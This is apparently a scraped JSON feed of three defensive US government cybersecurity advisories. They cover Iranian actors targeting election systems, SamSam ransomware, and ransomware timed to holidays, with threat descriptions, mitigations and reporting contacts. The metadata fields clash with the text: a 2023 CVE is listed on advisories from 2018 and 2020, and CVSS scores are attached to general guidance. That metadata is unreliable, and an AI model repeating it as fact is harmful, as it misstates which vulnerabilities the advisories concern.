can use web shells to execute arbitrary system commands, which are commonly sent over HTTP or HTTPS. Attackers often create web shells by adding or modifying a file in an existing web application. Web shells provide attackers with persistent access to a compromised network using communications channels disguised to blend in with legitimate traffic. Web shell malware is a long-standing, pervasive threat that continues to evade many security tools.\n\n##### Use multi-factor authentication for administrator accounts\n\nPrioritize protection for accounts with elevated privileges, with remote access, and/or used on high value assets.[[7](<https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs>)] Use physical token-based authentication systems to supplement knowledge-based factors such as passwords and personal identification numbers (PINs).[[8](<https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf>)] Organizations should migrate away from single-factor authentication, such as password-based systems, which are subject to poor user choices and more susceptible to credential theft, forgery, and password reuse across multiple systems.\n\n##### Remediate critical web application security risks\n\nFirst, identify and remedite critical web application security risks first; then, move on to other less critical vulnerabilities. Follow available guidance on securing web applications.[[9](<https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm>)],[[10](<https://owasp.org/www-project-top-ten/>)],[[11](<https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html>)]\n\n##### How do I respond to unauthorized access to election-related systems?\n\n###### Implement your security incident response and business continuity plan\n\nIt may take time for your organization\u2019s IT professionals to isolate and remove threats to your systems and restore normal operations. In the meantime, take steps to maintain your organization\u2019s essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.\n\n###### Contact CISA or law enforcement immediately\n\nTo report an intrusion and to request incident response resources or technical assistance, contact CISA ([Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) or 888-282-0870) or the Federal Bureau of Investigation (FBI) through a local field office or the FBI\u2019s Cyber Division ([CyWatch@ic.fbi.gov](<mailto:CyWatch@ic.fbi.gov>) or 855-292-3937).\n\n### Resources\n\n * [CISA Tip: Best Practices for Securing Election Systems](<https://us-cert.cisa.gov/ncas/tips/ST19-002>)\n * [CISA Tip: Securing Voter Registration Data](<https://us-cert.cisa.gov/ncas/tips/ST16-001>)\n * [CISA Tip: Website Security](<https://us-cert.cisa.gov/ncas/tips/ST18-006>)\n * [CISA Tip: Avoiding Social Engineering and Phishing Attacks](<https://us-cert.cisa.gov/ncas/tips/ST04-014>)\n * [CISA Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n * [CISA Activity Alert: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * [CISA Insights: Actions to Counter Email-Based Attacks On Election-related Entities](<https://www.cisa.gov/sites/default/files/publications/CISA_Insights_Actions_to_Counter_Email-Based_Attacks_on_Election-Related_S508C.pdf >)\n * FBI and CISA Public Service Announcement (PSA): [Spoofed Internet Domains and Email Accounts Pose Cyber and Disinformation Risks to Voters](<https://ic3.gov/Media/Y2020/PSA201002>)\n * FBI and CISA PSA: [Foreign Actors Likely to Use Online Journals to Spread Disinformation Regarding 2020 Elections](<https://www.ic3.gov/Media/Y2020/PSA201001>)\n * FBI and CISA PSA: [Distributed Denial of Service Attacks Could Hinder Access to Voting Information, Would Not Prevent Voting](<https://www.ic3.gov/Media/Y2020/PSA200930>)\n * FBI and CISA PSA: [False Claims of Hacked Voter Information Likely Intended to Cast Doubt on Legitimacy of U.S. Elections](<https://www.ic3.gov/Media/Y2020/PSA200928>)\n * FBI and CISA PSA: [Cyber Threats to Voting Processes Could Slow But Not Prevent Voting](<https://ic3.gov/Media/Y2020/PSA200924>)\n * FBI and CISA PSA: [Foreign Actors and Cybercriminals Likely to Spread Disinformation Regarding 2020 Election Results](<https://ic3.gov/Media/Y2020/PSA200922>) \n\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<http://www.fbi.gov/contact-us/field>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. To request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>).\n\n### References\n\n[[1] F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>)\n\n[[2] Progress Telerik details for CVE-2017-9248](<https://www.telerik.com/support/kb/aspnet-ajax/details/cryptographic-weakness>)\n\n[[3] NSA \"NSA'S Top Ten Cybersecurity Mitigation Strategies](<https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf>)\n\n[[4] OWASP Dependency-Check](<https://owasp.org/www-project-dependency-check/>)\n\n[[5] NSA \"Defending Against the Exploitation of SQL Vulnerabilities to Compromise a Network\" ](<https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/defending-against-the-exploitation-of-sql-vulnerabilities-to.cfm>)\n\n[[6] NSA & ASD \"CyberSecurity Information: Detect and Prevent Web Shell Malware\" ](<https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF>)\n\n[[7] CISA: Identifying and Protecting High Value Assets: A Closer Look at Governance Needs for HVAs: ](<https://us-cert.cisa.gov/cdm/event/Identifying-and-Protecting-High-Value-Assets-Closer-Look-Governance-Needs-HVAs>)\n\n[[8] NSA \"NSA'S Top Ten Cybersecurity Mitigation Strategies\" ](<https://www.nsa.gov/Portals/70/documents/what-we-do/cybersecurity/professional-resources/csi-nsas-top10-cybersecurity-mitigation-strategies.pdf>)\n\n[[9] NSA \u201cBuilding Web Applications \u2013 Security for Developers\u201d: ](<https://apps.nsa.gov/iaarchive/library/ia-guidance/security-tips/building-web-applications-security-recommendations-for.cfm>)\n\n[[10] OWASP Top Ten](<https://owasp.org/www-project-top-ten/>)\n\n[[11] 2020 CWE Top 25 Most Dangerous Software Weaknesses](<https://cwe.mitre.org/top25/archive/2020/2020_cwe_top25.html>)\n\n### Revisions\n\nOctober 22, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-10-22T12:00:00", "type": "ics", "title": "Iranian Advanced Persistent Threat Actors Threaten Election-Related Systems", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9248", "CVE-2020-5902", "CVE-2023-27350"], "modified": "2020-10-22T12:00:00", "id": "AA20-296B", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-296b", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-31T15:38:41", "description": "### Summary\n\nThe Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) and the Federal Bureau of Investigation (FBI) are issuing this activity alert to inform computer network defenders about SamSam ransomware, also known as MSIL/Samas.A. Specifically, this product shares analysis of vulnerabilities that cyber actors exploited to deploy this ransomware. In addition, this report provides recommendations for prevention and mitigation.\n\nThe SamSam actors targeted multiple industries, including some within critical infrastructure. Victims were located predominately in the United States, but also internationally. Network-wide infections against organizations are far more likely to garner large ransom payments than infections of individual systems. Organizations that provide essential functions have a critical need to resume operations quickly and are more likely to pay larger ransoms.\n\nThe actors exploit Windows servers to gain persistent access to a victim\u2019s network and infect all reachable hosts. According to reporting from victims in early 2016, cyber actors used the JexBoss Exploit Kit to access vulnerable JBoss applications. Since mid-2016, FBI analysis of victims\u2019 machines indicates that cyber actors use Remote Desktop Protocol (RDP) to gain persistent access to victims\u2019 networks. Typically, actors either use brute force attacks or stolen login credentials. Detecting RDP intrusions can be challenging because the malware enters through an approved access point.\n\nAfter gaining access to a particular network, the SamSam actors escalate privileges for administrator rights, drop malware onto the server, and run an executable file, all without victims\u2019 action or authorization. While many ransomware campaigns rely on a victim completing an action, such as opening an email or visiting a compromised website, RDP allows cyber actors to infect victims with minimal detection.\n\nAnalysis of tools found on victims\u2019 networks indicated that successful cyber actors purchased several of the stolen RDP credentials from known darknet marketplaces. FBI analysis of victims\u2019 access logs revealed that the SamSam actors can infect a network within hours of purchasing the credentials. While remediating infected systems, several victims found suspicious activity on their networks unrelated to SamSam. This activity is a possible indicator that the victims\u2019 credentials were stolen, sold on the darknet, and used for other illegal activity.\n\nSamSam actors leave ransom notes on encrypted computers. These instructions direct victims to establish contact through a Tor hidden service site. After paying the ransom in Bitcoin and establishing contact, victims usually receive links to download cryptographic keys and tools to decrypt their network.\n\n### Technical Details\n\nNCCIC recommends organizations review the following SamSam Malware Analysis Reports. The reports represent four SamSam malware variants. This is not an exhaustive list.\n\n * MAR-10219351.r1.v2 \u2013 SamSam1\n * MAR-10166283.r1.v1 \u2013 SamSam2\n * MAR-10158513.r1.v1 \u2013 SamSam3\n * MAR-10164494.r1.v1 \u2013 SamSam4\n\nFor general information on ransomware, see the NCCIC Security Publication at https://www.us-cert.gov/security-publications/Ransomware.\n\n### Mitigations\n\nDHS and FBI recommend that users and administrators consider using the following best practices to strengthen the security posture of their organization's systems. System owners and administrators should review any configuration changes before implementation to avoid unwanted impacts.\n\n * Audit your network for systems that use RDP for remote communication. Disable the service if unneeded or install available patches. Users may need to work with their technology venders to confirm that patches will not affect system processes.\n * Verify that all cloud-based virtual machine instances with public IPs have no open RDP ports, especially port 3389, unless there is a valid business reason to keep open RDP ports. Place any system with an open RDP port behind a firewall and require users to use a virtual private network (VPN) to access that system.\n * Enable strong passwords and account lockout policies to defend against brute force attacks.\n * Where possible, apply two-factor authentication.\n * Regularly apply system and software updates.\n * Maintain a good back-up strategy.\n * Enable logging and ensure that logging mechanisms capture RDP logins. Keep logs for a minimum of 90 days and review them regularly to detect intrusion attempts.\n * When creating cloud-based virtual machines, adhere to the cloud provider\u2019s best practices for remote access.\n * Ensure that third parties that require RDP access follow internal policies on remote access.\n * Minimize network exposure for all control system devices. Where possible, disable RDP on critical devices.\n * Regulate and limit external-to-internal RDP connections. When external access to internal resources is required, use secure methods such as VPNs. Of course, VPNs are only as secure as the connected devices.\n * Restrict users' ability (permissions) to install and run unwanted software applications.\n * Scan for and remove suspicious email attachments; ensure the scanned attachment is its \"true file type\" (i.e., the extension matches the file header).\n * Disable file and printer sharing services. If these services are required, use strong passwords or Active Directory authentication.\n\nAdditional information on malware incident prevention and handling can be found in Special Publication 800-83, _Guide to Malware Incident Prevention and Handling for Desktops and Laptops_, from the National Institute of Standards and Technology.[[1]](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-83r1.pdf>)\n\n### Contact Information\n\nTo report an intrusion and request resources for incident response or technical assistance, contact NCCIC, FBI, or the FBI\u2019s Cyber Division via the following information:\n\n * NCCIC \n * [NCCICCustomerService@hq.dhs.gov](<mailto:NCCICCustomerService@hq.dhs.gov>)\n * 888-282-0870\n * FBI\u2019s Cyber Division \n * [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)\n * 855-292-3937\n * FBI through a local field office\n\n### Feedback\n\nDHS strives to make this report a valuable tool for our partners and welcomes feedback on how this publication could be improved. You can help by answering a few short questions about this report at the following URL: https://www.us-cert.gov/forms/feedback.\n\n### References\n\n[[1] NIST SP 800-83: Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-83r1.pdf>)\n\n### Revisions\n\nDecember 3, 2018: Initial version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-12-03T12:00:00", "type": "ics", "title": "SamSam Ransomware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2023-27350"], "modified": "2018-12-03T12:00:00", "id": "AA18-337A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa18-337a", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-31T15:25:48", "description": "### Summary\n\n_**Immediate Actions You Can Take Now to Protect Against Ransomware** \n\u2022 Make an [offline backup ](<https://cisa.gov/sites/default/files/publications/Cyber Essentials Toolkit 5 20201015_508.pdf>)of your data. \n\u2022 Do not click on [suspicious links](<https://us-cert.cisa.gov/ncas/tips/ST04-014>). \n\u2022 If you use [RDP](<https://www.ic3.gov/Media/Y2018/PSA180927>), secure and monitor it. \n\u2022 [Update](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) your OS and software. \n\u2022 Use [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>). \n\u2022 __Use [multi-factor authentication](<https://us-cert.cisa.gov/ncas/tips/ST05-012>)._\n\nThe Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have observed an increase in highly impactful ransomware attacks occurring on holidays and weekends\u2014when offices are normally closed\u2014in the United States, as recently as the Fourth of July holiday in 2021. The FBI and CISA do not currently have any specific threat reporting indicating a cyberattack will occur over the upcoming Labor Day holiday. However, the FBI and CISA are sharing the below information to provide awareness to be especially diligent in your network defense practices in the run up to holidays and weekends, based on recent actor tactics, techniques, and procedures (TTPs) and cyberattacks over holidays and weekends during the past few months. The FBI and CISA encourage all entities to examine their current cybersecurity posture and implement the recommended best practices and mitigations to manage the risk posed by all cyber threats, including ransomware.\n\nClick here for a PDF copy of this report.\n\n### Threat Overview\n\n#### **Recent Holiday Targeting**\n\nCyber actors have conducted increasingly impactful attacks against U.S. entities on or around holiday weekends over the last several months. The FBI and CISA do not currently have specific information regarding cyber threats coinciding with upcoming holidays and weekends. Cyber criminals, however, may view holidays and weekends\u2014especially holiday weekends\u2014as attractive timeframes in which to target potential victims, including small and large businesses. In some cases, this tactic provides a head start for malicious actors conducting network exploitation and follow-on propagation of ransomware, as network defenders and IT support of victim organizations are at limited capacity for an extended time.\n\n * In May 2021, leading into Mother\u2019s Day weekend, malicious cyber actors deployed DarkSide ransomware against the IT network of a U.S.-based critical infrastructure entity in the Energy Sector, resulting in a week-long suspension of operations. After DarkSide actors gained access to the victim\u2019s network, they deployed ransomware to encrypt victim data and\u2014as a secondary form of extortion\u2014exfiltrated the data before threatening to publish it to further pressure victims into paying the ransom demand.\n * In May 2021, over the Memorial Day weekend, a critical infrastructure entity in the Food and Agricultural Sector suffered a Sodinokibi/REvil ransomware attack affecting U.S. and Australian meat production facilities, resulting in a complete production stoppage.\n * In July 2021, during the Fourth of July holiday weekend, Sodinokibi/REvil ransomware actors attacked a U.S.-based critical infrastructure entity in the IT Sector and implementations of their remote monitoring and management tool, affecting hundreds of organizations\u2014including multiple managed service providers and their customers.\n\n#### **Ransomware Trends**\n\nThe FBI's Internet Crime Complaint Center (IC3), which provides the public with a trustworthy source for reporting information on cyber incidents, received 791,790 complaints for all types of internet crime\u2014a record number\u2014from the American public in 2020, with reported losses exceeding $4.1 billion. This represents a 69 percent increase in total complaints from 2019. The number of ransomware incidents also continues to rise, with 2,474 incidents reported in 2020, representing a 20 percent increase in the number of incidents, and a 225 percent increase in ransom demands. From January to July 31, 2021, the IC3 has received 2,084 ransomware complaints with over $16.8M in losses, a 62 percent increase in reporting and 20 percent increase in reported losses compared to the same time frame in 2020.This number includes only those victims who have provided information to IC3. The following ransomware variants have been the most frequently reported to FBI in attacks over the last month.\n\n * Conti\n * PYSA\n * LockBit\n * RansomEXX/Defray777\n * Zeppelin\n * Crysis/Dharma/Phobos\n\nThe destructive impact of ransomware continues to evolve beyond encryption of IT assets. Cyber criminals have increasingly targeted large, lucrative organizations and providers of critical services with the expectation of higher value ransoms and increased likelihood of payments. Cyber criminals have also increasingly coupled initial encryption of data with a secondary form of extortion, in which they threaten to publicly name affected victims and release sensitive or proprietary data exfiltrated before encryption, to further encourage payment of ransom. (See CISA\u2019s Fact Sheet: [Protecting Sensitive and Personal Information from Ransomware-Caused Data Breaches](<https://www.cisa.gov/publication/protecting-sensitive-and-personal-information>).) Malicious actors have also added tactics, such as encrypting or deleting system backups\u2014making restoration and recovery more difficult or infeasible for impacted organizations.\n\nAlthough cyber criminals use a variety of techniques to infect victims with ransomware, the two most prevalent initial access vectors are phishing and brute forcing unsecured remote desktop protocol (RDP) endpoints. Additional common means of initial infection include deployment of precursor or dropper malware; exploitation of software or operating system vulnerabilities; exploitation of managed service providers with access to customer networks; and the use of valid, stolen credentials, such as those purchased on the dark web. Precursor malware enables cyber actors to conduct reconnaissance on victim networks, steal credentials, escalate privileges, exfiltrate information, move laterally on the victim network, and obfuscate command-and-control communications. Cyber actors use this access to: \n\n * Evaluate a victim\u2019s ability to pay a ransom.\n * Evaluate a victim\u2019s incentive to pay a ransom to: \n * Regain access to their data and/or \n * Avoid having their sensitive or proprietary data publicly leaked.\n * Gather information for follow-on attacks before deploying ransomware on the victim network.\n\n### Threat Hunting\n\nThe FBI and CISA suggest organizations engage in preemptive threat hunting on their networks. Threat hunting is a proactive strategy to search for signs of threat actor activity to prevent attacks before they occur or to minimize damage in the event of a successful attack. Threat actors can be present on a victim network long before they lock down a system, alerting the victim to the ransomware attack. Threat actors often search through a network to find and compromise the most critical or lucrative targets. Many will exfiltrate large amounts of data. Threat hunting encompasses the following elements of understanding the IT environment by developing a baseline through a behavior-based analytics approach, evaluating data logs, and installing automated alerting systems. \n\n * **Understand the IT environment\u2019s routine activity and architecture by establishing a baseline.** By implementing a behavior-based analytics approach, an organization can better assess user, endpoint, and network activity patterns. This approach can help an organization remain alert on deviations from normal activity and detect anomalies. Understanding when users log in to the network\u2014and from what location\u2014can assist in identifying anomalies. Understanding the baseline environment\u2014including the normal internal and external traffic\u2014can also help in detecting anomalies. Suspicious traffic patterns are usually the first indicators of a network incident but cannot be detected without establishing a baseline for the corporate network.\n * **Review data logs.** Understand what standard performance looks like in comparison to suspicious or anomalous activity. Things to look for include: \n * Numerous failed file modifications,\n * Increased CPU and disk activity,\n * Inability to access certain files, and\n * Unusual network communications.\n * **Employ intrusion prevention systems and automated security alerting systems**\u2014such as security information event management software, intrusion detection systems, and endpoint detection and response.\n * **Deploy honeytokens** and alert on their usage to detect lateral movement.\n\nIndicators of suspicious activity that threat hunters should look for include:\n\n * Unusual inbound and outbound network traffic,\n * Compromise of administrator privileges or escalation of the permissions on an account,\n * Theft of login and password credentials,\n * Substantial increase in database read volume,\n * Geographical irregularities in access and log in patterns,\n * Attempted user activity during anomalous logon times, \n * Attempts to access folders on a server that are not linked to the HTML within the pages of the web server, and\n * Baseline deviations in the type of outbound encrypted traffic since advanced persistent threat actors frequently encrypt exfiltration.\n\nSee the joint advisory from Australia, Canada, New Zealand, the United Kingdom, and the United States on [Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>) for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. Also review the Ransomware Response Checklist in the [CISA-Multi-State Information Sharing and Analysis Center (MS-ISAC) Joint Ransomware Guide](<https://www.cisa.gov/stopransomware/ransomware-guide>).\n\n#### **Cyber Hygiene Services**\n\nCISA offers a range of no-cost [cyber hygiene services](<https://www.cisa.gov/cyber-hygiene-services>)\u2014including vulnerability scanning and ransomware readiness assessments\u2014to help critical infrastructure organizations assess, identify, and reduce their exposure to cyber threats. By taking advantage of these services, organizations of any size will receive recommendations on ways to reduce their risk and mitigate attack vectors. \n\n### Ransomware Best Practices\n\nThe FBI and CISA strongly discourage paying a ransom to criminal actors. Payment does not guarantee files will be recovered, nor does it ensure protection from future breaches. Payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of malware, and/or fund illicit activities. Regardless of whether you or your organization decide to pay the ransom, the FBI and CISA urge you to report ransomware incidents to [CISA](<https://us-cert.cisa.gov/report>), a [local FBI field office](<https://www.fbi.gov/contact-us/field-offices>), or by [filing a report with IC3](<https://www.ic3.gov/Home/FileComplaint>) at [IC3.gov](<https://www.ic3.gov/>). Doing so provides the U.S. Government with critical information needed to help victims, track ransomware attackers, hold attackers accountable under U.S. law, and share information to prevent future attacks.\n\n#### **Information Requested**\n\nUpon receiving an incident report, the FBI or CISA may seek forensic artifacts, to the extent that affected entities determine such information can be legally shared, including: \n\n * Recovered executable file(s),\n * Live memory (RAM) capture,\n * Images of infected systems,\n * Malware samples, and\n * Ransom note.\n\n### Recommended Mitigations\n\nThe FBI and CISA highly recommend organizations continuously and actively monitor for ransomware threats over holidays and weekends.FBI and CISA highly recommend IT security personnel subscribe to CISA cybersecurity publications (https://public.govdelivery.com/accounts/USDHSCISA/subscriber/new?qsp=CODE_RED)\u2014and regularly visit the FBI Internet Crime Complaint Center (https://www.ic3.gov/)\u2014for the latest alerts. Additionally, the FBI and CISA recommend identifying IT security employees to be available and \"on call\" during these times, in the event of a ransomware attack. The FBI and CISA also suggest applying the following network best practices to reduce the risk and impact of compromise.\n\n#### **Make an offline backup of your data.**\n\n * Make and maintain offline, encrypted backups of data and regularly test your backups. Backup procedures should be conducted on a regular basis. It is important that backups be maintained offline as many ransomware variants attempt to find and delete or encrypt accessible backups.\n * Review your organization's backup schedule to take into account the risk of a possible disruption to backup processes during weekends or holidays.\n\n#### **Do not click on suspicious links.**\n\n * Implement a user training program and phishing exercises to raise awareness among users about the risks involved in visiting malicious websites or opening malicious attachments and to reinforce the appropriate user response to phishing and spearphishing emails.\n\n#### **If you use RDP\u2014or other potentially risky services\u2014secure and monitor.**\n\n * Limit access to resources over internal networks, especially by restricting RDP and using virtual desktop infrastructure. After assessing risks, if RDP is deemed operationally necessary, restrict the originating sources and require MFA. If RDP must be available externally, it should be authenticated via VPN.\n * Monitor remote access/RDP logs, enforce account lockouts after a specified number of attempts, log RDP login attempts, and disable unused remote access/RDP ports.\n * Ensure devices are properly configured and that security features are enabled. Disable ports and protocols that are not being used for a business purpose (e.g., RDP Transmission Control Protocol Port 3389). \n * Disable or block Server Message Block (SMB) protocol outbound and remove or disable outdated versions of SMB. Threat actors use SMB to propagate malware across organizations.\n * Review the security posture of third-party vendors and those interconnected with your organization. Ensure all connections between third-party vendors and outside software or hardware are monitored and reviewed for suspicious activity.\n * Implement listing policies for applications and remote access that only allow systems to execute known and permitted programs under an established security policy.\n * Open document readers in protected viewing modes to help prevent active content from running.\n\n#### **Update your OS and software; scan for vulnerabilities.**\n\n * Upgrade software and operating systems that are no longer supported by vendors to currently supported versions. Regularly patch and update software to the latest available versions. Prioritize timely patching of internet-facing servers\u2014as well as software processing internet data, such as web browsers, browser plugins, and document readers\u2014for known vulnerabilities. Consider using a centralized patch management system; use a risk-based assessment strategy to determine which network assets and zones should participate in the patch management program.\n * Automatically update antivirus and anti-malware solutions and conduct regular virus and malware scans.\n * Conduct regular vulnerability scanning to identify and address vulnerabilities, especially those on internet-facing devices. (See the Cyber Hygiene Services section above for more information on CISA\u2019s free services.)\n\n#### **Use strong passwords.**\n\n * Ensure [strong passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and challenge responses. Passwords should not be reused across multiple accounts or stored on the system where an adversary may have access.\n\n#### **Use multi-factor authentication.**\n\n * Require [multi-factor authentication ](<https://media.defense.gov/2020/Sep/22/2002502665/-1/-1/0/Multifactor_Authentication_Solutions_UOO17091520_V1.1 - Copy.PDF>)(MFA) for all services to the extent possible, particularly for remote access, virtual private networks, and accounts that access critical systems. \n\n#### **Secure your network(s): implement segmentation, filter traffic, and scan ports.**\n\n * Implement network segmentation with multiple layers, with the most critical communications occurring in the most secure and reliable layer.\n * Filter network traffic to prohibit ingress and egress communications with known malicious IP addresses. Prevent users from accessing malicious websites by implementing URL blocklists and/or allowlists.\n * Scan network for open and listening ports and close those that are unnecessary.\n * For companies with employees working remotely, secure home networks\u2014including computing, entertainment, and Internet of Things devices\u2014to prevent a cyberattack; use separate devices for separate activities; and do not exchange home and work content. \n\n#### **Secure your user accounts.**\n\n * Regularly audit administrative user accounts and configure access controls under the principles of least privilege and separation of duties.\n * Regularly audit logs to ensure new accounts are legitimate users.\n\n#### **Have an incident response plan.**\n\n * Create, maintain, and exercise a basic cyber incident response plan that: \n * Includes procedures for response and notification in a ransomware incident and\n * Plans for the possibility of critical systems being inaccessible for a period of time.\n\n**Note: **for help with developing your plan, review available incident response guidance, such as the [Public Power Cyber Incident Response Playbook ](<https://www.publicpower.org/system/files/documents/Public-Power-Cyber-Incident-Response-Playbook.pdf>)and the Ransomware Response Checklist in the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n\n#### **Use the Ransomware Response Checklist in case of infection.**\n\nIf your organization is impacted by a ransomware incident, the FBI and CISA recommend the following actions.\n\n * Follow the Ransomware Response Checklist on p. 11 of the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>).\n * Scan your backups. If possible, scan your backup data with an antivirus program to check that it is free of malware.\n\n### Additional Resources\n\nFor additional resources related to the prevention and mitigation of ransomware, go to [https://www.stopransomware.gov](<https://www.stopransomware.gov/>) as well as the [CISA-MS-ISAC Joint Ransomware Guide](<https://cisa.gov/sites/default/files/publications/CISA_MS-ISAC_Ransomware Guide_S508C_.pdf>). Stopransomware.gov is the U.S. Government\u2019s new, official one-stop location for resources to tackle ransomware more effectively. Additional resources include:\n\n * CISA Insights: [Mitigations and Hardening Guidance for MSPs and Small- and Mid-sized Businesses](<https://www.cisa.gov/sites/default/files/publications/CISA Insights_Guidance-for-MSPs-and-Small-and-Mid-sized-Businesses_S508C.pdf>)\n * CISA: [Cyber Essentials](<https://www.cisa.gov/cyber-essentials>)\n * NIST SP 800-83 Rev. 1: [Guide to Malware Incident Prevention and Handling for Desktops and Laptops](<https://csrc.nist.gov/publications/detail/sp/800-83/rev-1/final>)\n * NIST SP 800-46 Rev. 2: [Guide to Enterprise Telework, Remote Access, and Bring Your Own Device (BYOD) Security](<https://csrc.nist.gov/publications/detail/sp/800-46/rev-2/final>)\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at[ www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. If you have any further questions related to this Joint Cybersecurity Advisory, or to request incident response resources or technical assistance related to these threats, contact CISA at [Central@cisa.gov](<mailto:Central@cisa.gov>).\n\n### Revisions\n\nAugust 31, 2021: Initial Version|September 2, 2021: Updated mitigations to better align with Ransomware Response Checklist.|February 10, 2022: Updated broken URL\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-10T12:00:00", "type": "ics", "title": "Ransomware Awareness for Holidays and Weekends", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", 